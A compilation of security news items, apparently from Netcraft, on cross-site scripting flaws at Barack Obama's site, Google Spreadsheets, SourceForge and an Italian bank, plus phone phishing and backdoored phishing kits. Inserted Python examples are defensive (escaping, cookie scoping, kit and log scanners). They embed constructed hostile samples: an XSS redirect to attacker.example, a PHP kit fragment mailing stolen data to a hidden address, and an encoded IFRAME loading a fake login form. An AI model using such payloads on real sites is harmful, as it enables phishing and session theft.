Hacker Redirects Barack Obama’s site to hillaryclinton.com

A security weakness in Barack Obama's website has been exploited to redirect visitors to Hillary Clinton's website. Visitors who viewed the Community Blogs section of the site were instead presented with Clinton's website as a result of a cross-site scripting vulnerability.

[Figure: Barack Obama's visitors were redirected to this site.]

A user named Mox, from Liverpool, IL, posted an apparent confession in the Community Blogs section on the Barack Obama website yesterday. The subject of the post was, 'I am the one who "hacked" Obamas site.'

Mox plays down the matter, saying that all he did was exploit some poorly written HTML, before suggesting that it was a cross-site scripting vulnerability that had been exploited. The site allowed users to enter characters such as > and " into their blog URLs without escaping them, which is enough to break out of the HTML attribute and tag the URL is placed in. JavaScript could therefore be injected into pages in the Community Blogs section, where it would be executed by subsequent visitors.
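The attribute-injection pattern described above, as an added example (this is illustrative code, not the Obama site's actual template). The page name, the sample URLs and the attacker host are assumptions. The point it makes is that a scheme check on its own is not enough: the hostile URL below passes a reasonable http/https check and still breaks out of the attribute, so the value must also be escaped for the attribute context.

```python
import html
from urllib.parse import urlsplit

# Constructed sample profile URLs: one benign, one in the style the article
# describes (a " closes the href attribute, a > closes the tag, then a script follows).
SAFE_URL = "http://example.org/myblog"
EVIL_URL = 'http://x/"><script>document.location="http://attacker.example/"</script>'


def render_blog_link_vulnerable(url, label):
    """Naive template: the user-supplied URL is concatenated straight into the attribute."""
    return f'<a href="{url}">{label}</a>'


def is_allowed_url(url):
    """Allow only absolute http(s) URLs; this blocks javascript: but NOT attribute break-out."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_blog_link_hardened(url, label):
    """Validate the scheme, then escape for the attribute context (quotes, <, >, & and ')."""
    if not is_allowed_url(url):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


if __name__ == "__main__":
    print(render_blog_link_vulnerable(EVIL_URL, "my blog"))  # live <script> tag in the page
    print(render_blog_link_hardened(EVIL_URL, "my blog"))    # inert: &quot;&gt;&lt;script&gt;...
    print(render_blog_link_hardened("javascript:alert(1)", "my blog"))
```

The hardened version is what a reviewer should look for in any template that echoes a user-controlled URL: a scheme allow-list plus context-specific escaping, not one or the other.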

A YouTube clip from zennie62 demonstrates the attack. The clip shows a user clicking on the Community Blogs section of the Barack Obama site, which subsequently causes the browser to redirect to hillaryclinton.com. The author speculates that "Senator Clinton's staffers possibly hired someone to hack into the Barack Obama website system." No evidence is offered to back up this statement.

[Figure: Another vulnerability found on the Barack Obama site.]

While Mox states that the original issue has now been fixed, a number of similar vulnerabilities have since been identified and remain unfixed, and are documented on xssed.com, which notes that such vulnerabilities open up opportunities to infect Obama's supporters and site visitors with malware, adware and spyware.

Google Spreadsheets vulnerability exposes IE users’ Gmail, Documents and more

An interesting cross-site scripting (XSS) vulnerability found in the Google Spreadsheets service would have allowed attackers to gain unauthorised access to other Google services, including Gmail and Google Docs.

The vulnerability was discovered by security engineer Billy Rios, and takes advantage of nuances in the way Internet Explorer handles Content-Types for webpages.

[Figure: Google Spreadsheets XSS]

When a spreadsheet is saved and downloaded in CSV format, the Content-Type is set to "text/plain", thereby instructing the client's browser that the document should be treated as plain text. However, if HTML tags are entered into the first cell of the spreadsheet, Internet Explorer's content sniffing detects these tags near the start of the CSV document and overrides the declared type, treating the response as HTML instead. This essentially allowed arbitrary HTML webpages to be served from spreadsheets.google.com, which in turn allowed JavaScript to be executed in the context of the spreadsheets.google.com site. A remote attacker could exploit this weakness to steal the user's session cookies and hijack their session.

Rios points out that Google cookies are valid for all google.com subdomains. This means that when a user logs in to Gmail, the Gmail cookie is also valid for other Google services, such as Google Code, Google Docs, Google Spreadsheets, and more. Cross-site scripting vulnerabilities in any of these subdomains can therefore allow an attacker to hijack a user's session and access other Google services as if they were that user.
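Why a cookie scoped to the parent domain turns an XSS on one subdomain into a session hijack everywhere, as an added example using Python's http.cookiejar to model browser cookie scoping offline (no request is sent). The cookie name "SID" and its value are placeholders, not real Google values; the two hostnames are the ones named in the article. The comparison is between a cookie set with Domain=.google.com and a host-only cookie bound to mail.google.com.

```python
import http.cookiejar
import urllib.request


def make_cookie(name, value, domain, domain_specified):
    """Build a Netscape-style cookie as a browser would store it.
    domain_specified=True with a leading dot models Set-Cookie ... Domain=.google.com;
    False models a host-only cookie bound to the exact host that set it."""
    return http.cookiejar.Cookie(
        version=0, name=name, value=value, port=None, port_specified=False,
        domain=domain, domain_specified=domain_specified,
        domain_initial_dot=domain.startswith("."),
        path="/", path_specified=True, secure=True, expires=None, discard=True,
        comment=None, comment_url=None, rest={}, rfc2109=False)


def cookie_header_for(jar, url):
    """The Cookie header the jar would attach to a request for url; None if nothing matches."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)  # computes the header only; nothing is transmitted
    return req.get_header("Cookie")


# Constructed session cookie; "SID" / "secret-session" are placeholders.
DOMAIN_JAR = http.cookiejar.CookieJar()
DOMAIN_JAR.set_cookie(make_cookie("SID", "secret-session", ".google.com", True))

HOST_ONLY_JAR = http.cookiejar.CookieJar()
HOST_ONLY_JAR.set_cookie(make_cookie("SID", "secret-session", "mail.google.com", False))

if __name__ == "__main__":
    for label, jar in (("Domain=.google.com", DOMAIN_JAR), ("host-only mail.google.com", HOST_ONLY_JAR)):
        for url in ("https://mail.google.com/", "https://spreadsheets.google.com/"):
            print(f"{label:26} -> {url:34} Cookie: {cookie_header_for(jar, url)}")
```

With the domain-wide cookie, script running on spreadsheets.google.com sees exactly the same Cookie header that Gmail does, which is the whole of Rios's point; with a host-only cookie, the spreadsheets origin gets nothing to steal.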

Google has fixed the vulnerability discovered by Rios and there have been no reports of the vulnerability being exploited by attackers.

Extended Validation certificates and XSS considered harmful

A cross-site scripting vulnerability on the popular SourceForge.net website shows how Extended Validation SSL certificates could be exploited by fraudsters. Piggybacking on the anticipated extra trust instilled by the presence of an EV SSL certificate, arbitrary content could be injected onto the secure page at SourceForge to create a very convincing phishing attack. The green address bar displayed by the web browser would assure users that they are looking at a website that can be trusted, even though the page they are looking at may contain scripts or HTML created by a remote attacker.

[Figure: The vulnerable page at SourceForge, showing the green address bar and injected JavaScript being executed.]

Extended Validation SSL certificates were originally created as a direct response to the rise in internet fraud, with additional verification processes reducing the likelihood of erroneously issuing a certificate to an unauthorised party. Modern web browsers treat EV SSL certificates differently to ordinary SSL certificates, typically turning the address bar green to show that a site can be trusted. Once users are conditioned into thinking that green means good, this could prove harmful when an EV SSL site contains a cross-site scripting vulnerability.

The number of EV SSL certificates in use worldwide is still relatively small and has only recently risen above 4,000. SourceForge is a large open source software development website, with a high ranking amongst users of the Netcraft Toolbar, and uses a VeriSign Class 3 Extended Validation SSL certificate for its main secure site at https://sourceforge.net.

[Figure: Nightly builds of Firefox also display the green address bar element.]

Both Internet Explorer 7 and recent nightly builds of the Mozilla Firefox web browser display a green address bar when accessing the vulnerable page at SourceForge, even when it is used to inject content that may have been created by a fraudster. Netcraft has informed SourceForge about this issue, although the xssed.com mirror, where this vulnerability was first discovered, suggests that it has remained unfixed since last year.

This discovery (believed to be the first documented case of XSS on an EV SSL website) highlights the need to remain wary of web application security, even when delivered with the most secure and trusted option of Extended Validation SSL certificates.

Netcraft offers extensive web application penetration and security testing services to identify vulnerabilities such as cross-site scripting.

Fraudster using phone numbers to receive authentication details

The Bank of Lancaster County is currently being targeted by a phishing attack that does away with the traditional web-based phishing forms. Instead, victims are asked to phone a toll free number to reactivate their card.

The scam is initiated by sending out phishing emails claiming that the victim's VISA card has been deactivated because it may have been used in illegal activities. Rather than clicking on a hyperlink and visiting a website to resolve the problem, the victim is asked to call a phone number based in Erie, Pennsylvania. To add credibility to the attack, the email claims that the phone number is toll free, which it is not.

[Figure: bankoflancaster.png]

Stealing credentials by phone remains a relatively rare phishing technique. For scalability, attacks like these are usually carried out by sending emails rather than initiating phone calls, and ask the recipient to call a phone number that purportedly belongs to the bank.

Ironically, phone phishing could prove more effective due to the methods some banks use to combat fraud. Some make automated phone calls to cardholders in the event of suspicious transactions, with the cardholder being prompted to respond by entering personal details before confirming a transaction. In practice, the cardholder has no way of ascertaining that the phone call is really coming from their bank, and expecting the cardholder to trust the automated caller is effectively grooming the bank's customers into falling for phone based phishing attacks.

The Bank of Lancaster County has published an alert advising customers about fraudulent emails that contain phone numbers, which when called, ask for personal information including account passwords and credit card numbers.

Mr-Brain: Stealing Phish from Fraudsters

A persistent group of Moroccan fraudsters calling themselves Mr-Brain has launched a website dedicated to offering easy-to-use phishing site code, email templates and other hacking tools. The website offers phishing kits for many of the most common targets, such as Bank of America, eBay, PayPal and HSBC.

The tools and code provided by Mr-Brain are designed to make it extremely easy for other fraudsters to deploy realistic phishing sites. Only a very basic knowledge of programming is required to configure the PHP scripts to send victims' details to the fraudsters' chosen electronic mail address. Deploying one of these fully working kits can be done in as little as one minute – another factor that adds to their appeal.

Tricking the Fraudsters

Mr-Brain's intentions are to encourage as many people as possible to use their phishing kits, for all is not what it seems at first glance. Careful inspection of the configuration script reveals deceptive code that hides the true set of electronic mail addresses that are contacted by the kit – every fraudster who uses these kits will unwittingly send a copy of each victim's details back to the Mr-Brain group.

[Figure: scam-pages.png]

The configuration script exploits the case-sensitivity in PHP variable names to disguise Mr-Brain’s electronic mail address as an unrelated but seemingly essential part of the script, encouraging fraudsters not to alter it. The injected electronic mail address is actually contained in a completely separate PHP file, where it is encrypted in a hidden input field named "niarB", or "Brain" backwards. Yet another PHP script reads the value from this input field and decrypts it before supplying it to the configuration script. Most fraudsters are unlikely to notice this level of obfuscation and will assume the script is working normally, as they will also receive a copy of any emails produced by the script.

When Netcraft decrypted the contents, the hidden input field revealed one of Mr-Brain's Gmail addresses, which is used to covertly capture details from all of the phishing kits that have been deployed on their behalf by other fraudsters. A comment at the top of one of the scripts aims to deter these fraudsters from examining the script that decrypts the hidden field:
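A triage script for the two tricks the previous paragraphs describe, as an added example; this is not Netcraft's tooling and the PHP fragment it scans is constructed to resemble the pattern (two variables differing only in case, and an encoded recipient in a hidden field named "niarB"), not Mr-Brain's actual kit. The encoding assumed for the hidden value is plain base64, which is an assumption; the article only says the field was "encrypted". The addresses are placeholders.

```python
import base64
import re
from collections import defaultdict

# Constructed sample kit fragment (not real Mr-Brain code). $email is the line the
# kit's "customer" is told to edit; $Email is a different PHP variable fed from a hidden field.
SAMPLE_KIT = r'''
<?php
$email = "customer@example.net";            // the fraudster edits this line
$Email = base64_decode($_POST["niarB"]);    // looks like the same variable, is not
mail($email, "Login", $message);
mail($Email, "Login", $message);
?>
<input type="hidden" name="niarB" value="a2l0LW93bmVyQGV4YW1wbGUuY29t">
'''

VAR_RE = re.compile(r"\$([A-Za-z_]\w*)")
HIDDEN_RE = re.compile(r'<input[^>]*type\s*=\s*"hidden"[^>]*>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def case_colliding_variables(src):
    """PHP variable names that differ only in case, grouped by their lower-cased form."""
    groups = defaultdict(set)
    for name in VAR_RE.findall(src):
        groups[name.lower()].add(name)
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def decode_candidates(value):
    """The raw value plus a base64 decoding, when that yields printable text."""
    yield value
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
        if decoded.isprintable():
            yield decoded
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        pass


def hidden_field_findings(src):
    """For each hidden input: its name, the name reversed, and any address hidden in its value."""
    findings = []
    for tag in HIDDEN_RE.findall(src):
        attrs = dict(ATTR_RE.findall(tag))
        name = attrs.get("name", "")
        value = attrs.get("value", "")
        emails = sorted({e for cand in decode_candidates(value) for e in EMAIL_RE.findall(cand)})
        findings.append({"name": name, "reversed": name[::-1], "emails": emails})
    return findings


def all_recipients(src):
    """Every address the kit could mail to, including ones recovered from encoded hidden fields."""
    found = set(EMAIL_RE.findall(src))
    for finding in hidden_field_findings(src):
        found.update(finding["emails"])
    return sorted(found)


if __name__ == "__main__":
    print("case collisions:", case_colliding_variables(SAMPLE_KIT))
    print("hidden fields:  ", hidden_field_findings(SAMPLE_KIT))
    print("all recipients: ", all_recipients(SAMPLE_KIT))
```

Run against a recovered kit, this surfaces the second recipient that a grep for "@" on the configuration file alone would miss, and the case collision that makes the two recipients look like one.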

[Figure: scam-pages3.png]

Earlier this month, Netcraft also exposed a similar phishing scam targeting Bank of America. This, too, was authored by Mr-Brain and was configured to covertly send harvested credentials to a different Gmail address.

[Figure: scam-pages2.png]

Each phishing kit listed on their website is accompanied by a description, showing what kind of information it steals from victims. One page on their website lists a selection of Social Security numbers, credit card numbers and PINs under the heading "Free and Freash [sic] Credit Card".

Mr-Brain claims that all of the scam pages offered on its site are undetected by Mozilla, Opera and Internet Explorer. Netcraft blocks these sites when they are detected by the Netcraft Toolbar community, and propagates the block to all companies which licence the Netcraft Phishing Site Feed.

Italian Bank’s XSS Opportunity Seized by Fraudsters

An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing emails which use a specially-crafted URL to inject a modified login form onto the bank's login page.

The vulnerable page is served over SSL with a bona fide SSL certificate issued to Banca Fideuram S.p.A. in Italy. Nonetheless, the fraudsters have been able to inject an IFRAME onto the login page which loads a modified login form from a web server hosted in Taiwan.

[Figure: The fraudsters' login form presented inside the bank's SSL page.]

This attack highlights the seriousness of cross-site scripting vulnerabilities on banking websites. It shows that security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name.

Cross-site scripting vulnerabilities on SSL sites also undermine the purpose of SSL certificates. While the attack detailed here injects external content via an IFRAME, it is important to note that a malicious payload could also be delivered solely via the vulnerable GET parameter. In the latter case, any SSL certificate associated with the site, including an Extended Validation certificate, would display a padlock icon and apparently assure the user that the injected login form is genuine.

This particular attack is made all the more convincing by the vector used by the fraudsters: the URL employed by the attack injects a series of numbers directly into a JavaScript function call that already exists on the bank's LoginServlet page. This makes it difficult even for an experienced user to identify this as a cross-site scripting attack, as the URL does not look readily suspicious, with the injected content consisting only of numbers and commas.
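A detection for this "numbers and commas" vector, as an added example that is not the bank's code or Netcraft's tooling. The screenshot caption states that the page decodes the GET parameter; this example assumes the decoding is of the String.fromCharCode kind (decimal character codes joined by commas), which is an assumption about the bank's LoginServlet page, not something the article confirms. The access-log lines, the parameter name "msg" and the 203.0.113.7 address are all constructed. The scan decodes any long comma-separated numeric list in a query string and flags it if the result looks like markup, which is exactly what an eyeball on the URL cannot do.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit


def to_char_codes(markup):
    """Turn markup into the comma-separated decimal character codes the vector carries."""
    return ",".join(str(ord(ch)) for ch in markup)


def from_char_codes(text):
    """Inverse of to_char_codes: what String.fromCharCode(...) would produce client-side."""
    return "".join(chr(int(n)) for n in text.split(","))


# Eight or more 1-3 digit integers separated by commas: long enough to carry a tag,
# short enough not to match an ordinary single numeric id.
CODE_LIST_RE = re.compile(r"^\d{1,3}(?:,\d{1,3}){7,}$")
MARKUP_RE = re.compile(r"<\s*(?:iframe|script|img|form|object|embed|a)\b|javascript:|\bon\w+\s*=", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_parameters(url):
    """(name, decoded_markup) for every query value that is a char-code list decoding to markup."""
    hits = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            value = re.sub(r"\s", "", unquote(value))
            if CODE_LIST_RE.match(value):
                decoded = from_char_codes(value)
                if MARKUP_RE.search(decoded):
                    hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Run the check over access-log lines; returns (request_target, hits) per flagged request."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            hits = suspicious_parameters(m.group(1))
            if hits:
                flagged.append((m.group(1), hits))
    return flagged


# Constructed log lines. The third carries an IFRAME pointing at an external host
# (203.0.113.7 is from the documentation address range) encoded purely as digits and commas.
PAYLOAD = to_char_codes('<iframe src="http://203.0.113.7/login.html" width="0" height="0"></iframe>')
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2008:09:14:02 +0000] "GET /LoginServlet?lang=it HTTP/1.1" 200 5120',
    '192.0.2.11 - - [12/Mar/2008:09:14:05 +0000] "GET /LoginServlet?lang=it&msg=7,8,9,10 HTTP/1.1" 200 5120',
    f'192.0.2.12 - - [12/Mar/2008:09:14:09 +0000] "GET /LoginServlet?lang=it&msg={PAYLOAD} HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print("payload as seen in the URL:", PAYLOAD[:60], "...")
    for target, hits in scan_log(SAMPLE_LOG):
        for name, decoded in hits:
            print(f"{target[:40]}...  param {name!r} decodes to: {decoded}")
```

The server-side fix is the usual one for a JavaScript context: never interpolate a request parameter into script, and if a numeric list really is required, parse it into integers on the server and emit it with a JSON encoder rather than string concatenation. Decoding it client-side into markup is the bug, whatever the characters look like in the URL.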

[Figure: The vulnerable page, decoding arbitrary GET parameters.]

In a possible attempt to bypass automated security filters, the injected content from Taiwan also contains encoded JavaScript which is used to display the text "Inserisci i tuoi codici personali" ("Insert your personal codes") and "per accedere alle aree riservate" ("To access all reserved areas"). When the modified form is submitted, the contents are transmitted to the Taiwanese server before the user is redirected to the bank's genuine, unaltered homepage.

Netcraft has contacted the bank affected by this attack and blocked the phishing site for all users of the Netcraft Toolbar, and propagated the block to the companies which licence the Netcraft PhishFeed.